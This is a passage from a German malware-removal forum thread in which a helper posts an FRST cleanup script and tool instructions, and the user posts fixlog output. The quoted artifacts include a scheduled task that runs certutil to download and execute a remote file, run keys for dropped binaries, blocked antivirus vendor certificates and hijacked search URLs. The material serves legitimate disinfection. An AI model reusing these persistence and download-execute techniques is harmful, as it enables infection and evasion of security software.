    2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
    2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
    2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
    2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
    2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
    2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
    2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
    2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
    2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
    2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
    2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
    2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
    2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
    2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
    2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
    2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
    2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
    2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
    2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
    2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
    2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
    2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
    2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
    ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
    C:\Windows\system32\mcicda64.dll
    Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
    C:\Program Files\Social Software
    Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
    C:\Program Files\SystemaRev
    Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
    Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
    Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
    C:\Program Files (x86)\nodejs
    Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
    Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
    Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
    Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
    Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
    Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
    Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
    C:\Program Files\Reimage
    Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
    C:\ProgramData\Iostream.exe
    ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    AlternateDataStreams: C:\ProgramData:NT [40]
    AlternateDataStreams: C:\ProgramData:NT2 [552]
    AlternateDataStreams: C:\Users\All Users:NT [40]
    AlternateDataStreams: C:\Users\All Users:NT2 [552]
    AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
    AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
    AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
    AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
    AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
    AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
    AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
    AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
    AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
    Unlock: C:\Windows\system32\Drivers\etc\hosts
    C:\Windows\system32\Drivers\etc\hosts
    Hosts:
    VirusTotal: C:\Windows\system32\ntkrnlmp.exe
    VirusTotal: C:\Windows\system32\osloader.exe
    VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
    Folder: C:\Windows\rss
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    RemoveProxy:
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset
    EmptyTemp:
    End::
             
  • Starte nun FRST und klicke direkt den Entfernen Button. Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich die FRST/FRST64.exe befindet.
  • Gegebenenfalls muss dein Rechner dafür neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.






Schritt 2
Downloade Dir bitte AdwCleaner auf deinen Desktop (Bebilderte Anleitung).
  • Schließe alle offenen Programme und Browser.
  • Starte die adwcleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Einstellungen, scrolle nach unten und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • IFEO-Schlüssel löschen
    • Firewall wiederherstellen
    • Tracing Schlüssel löschen
    • Prefetch-Dateien löschen
    • BITS wiederherstellen
    • Proxy wiederherstellen
    • IE-Policies wiederherstellen
    • Chrome-Policies wiederherstellen
    • Winsock wiederherstellen
  • Klicke nun auf Dashboard, dann auf Jetzt scannen und warte bis der Suchlauf abgeschlossen ist.
  • Klicke nun auf Bereinigen & Reparieren und bestätige mit Jetzt bereinigen.
  • WICHTIG:
    Sollte AdwCleaner nichts finden, klicke auf Grundlegende Reparatur ausführen und anschließend auf Jetzt bereinigen.
  • Nach dem Neustart öffnet sich AdwCleaner automatisch. Klicke auf Log-Datei ansehen.
  • Poste mir deren Inhalt der Log-Datei mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt. (xx = fortlaufende Nummer).





Schritt 3
Downloade Dir bitte Malwarebytes Anti-Malware 3 (Bebilderte Anleitung)
  • Installiere das Programm in den vorgegebenen Pfad.
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scan, wähle den Bedrohungs-Scan aus und klicke auf Scan starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Ausgewählte Elemente in die Quarantäne verschieben.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM nach dem Neustart, klicke auf Berichte.
  • Wähle den neuesten Scan-Bericht aus, klicke auf Bericht anzeigen und dann auf Export.
  • Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.





Schritt 4
  • Starte die FRST.exe erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.







Bitte poste mit deiner nächsten Antwort
  • die Logdatei des FRST-Fix,
  • die Logdatei von AdwCleaner,
  • die Logdatei von MBAM,
  • die zwei neuen Logdateien von FRST.
__________________
--> trojaner?/virus?

Geändert von M-K-D-B (30.05.2018 um 16:41 Uhr)

Alt 31.05.2018, 14:44   #7
moinbro
 
trojaner?/virus? - Standard

neu aufsetzen?



Mein PC ist so gut wie unbesiegbar, die maus ruckelt unvorstellbar stark, Programme brauchen mehrere Minuten bis sie sich öffnen oder reagieren.

Ich Frage mich ob es nicht mehr Sinn macht den PC neu aufzusetzen. Wichtige Daten hab ich gespeichert (extern) also habe ich kein Problem mit Datenverlust

Wenn ich die Schritte mit dem momentanen Zustand durchführen soll/muss dann brauche ich dafür womöglich 1 ganzen Tag wenn nicht sogar noch länger. Neu aufsetzen dauert ca einen halben Tag. Soll ich die Schritte durchführen oder neu aufsetzen?

Alt 31.05.2018, 15:35   #8
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
trojaner?/virus? - Standard

trojaner?/virus?



nein nicht so schnell aufgeben!! ich hab schon ganz viel popcorn für diesen Thread!

Bitte lass diesen Rechner von MKDB reinigen!
__________________
"Die Wahrheit ist normalerweise nur eine Entschuldigung für einen Mangel an Fantasie." (Elim Garak)

Das Trojaner-Board unterstützen
Warum Linux besser als Windows ist!

Alt 31.05.2018, 16:08   #9
moinbro
 
trojaner?/virus? - Standard

trojaner?/virus?



Also gut :/

"unbesiegbar" sollte übrigens "unbedienbar" heißen.

Alt 31.05.2018, 16:38   #10
moinbro
 
trojaner?/virus? - Standard

trojaner?/virus?



Ab Schritt 2 war er wieder einigermaßen bedienbar ^^.

Beim Neustart kam diese Nachricht C:/Users/1/AppData/Local/Temp/161131Log.iniis lost

Was soll mir das sagen? (die meldung kommt von "AsusSetup", mein Mainboard ist von Asus also gehe ich mal davon aus, dass die Datei wichtig ist.)

Wenn ich richtig gezählt habe waren es insgesamt 254 Funde oder wie auch immer man Das nennt.

Danke schonmal
Angehängte Dateien
Dateityp: txt Fixlog.txt (36,4 KB, 29x aufgerufen)
Dateityp: txt AdwCleaner[C00].txt (7,0 KB, 27x aufgerufen)
Dateityp: txt MBAM.txt (23,9 KB, 36x aufgerufen)
Dateityp: txt Addition.txt (25,8 KB, 21x aufgerufen)

Alt 31.05.2018, 18:42   #11
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
trojaner?/virus? - Standard

trojaner?/virus?



Damit alle die Logfiles lesen und auswerten können:

Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
__________________
"Die Wahrheit ist normalerweise nur eine Entschuldigung für einen Mangel an Fantasie." (Elim Garak)

Das Trojaner-Board unterstützen
Warum Linux besser als Windows ist!

Alt 31.05.2018, 21:23   #12
moinbro
 
trojaner?/virus? - Standard

trojaner?/virus?



Fixlog:
Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (31-05-2018 14:13:17) Run:1
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
C:\Program Files (x86)\Common Files\new.bat
HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
C:\Program Files\RDH9TH3UTU
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
C:\Users\Nico\AppData\Roaming\okdd3kogot1
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
C:\Program Files (x86)\eu0vb4pykb5
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
C:\Users\Nico\AppData\Local\pfialx.dll
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
C:\Program Files\I88TDHYW3R
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
C:\Windows\rss\csrss.exe
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe 
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
C:\Users\Nico\AppData\Roaming\EpicNet Inc
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
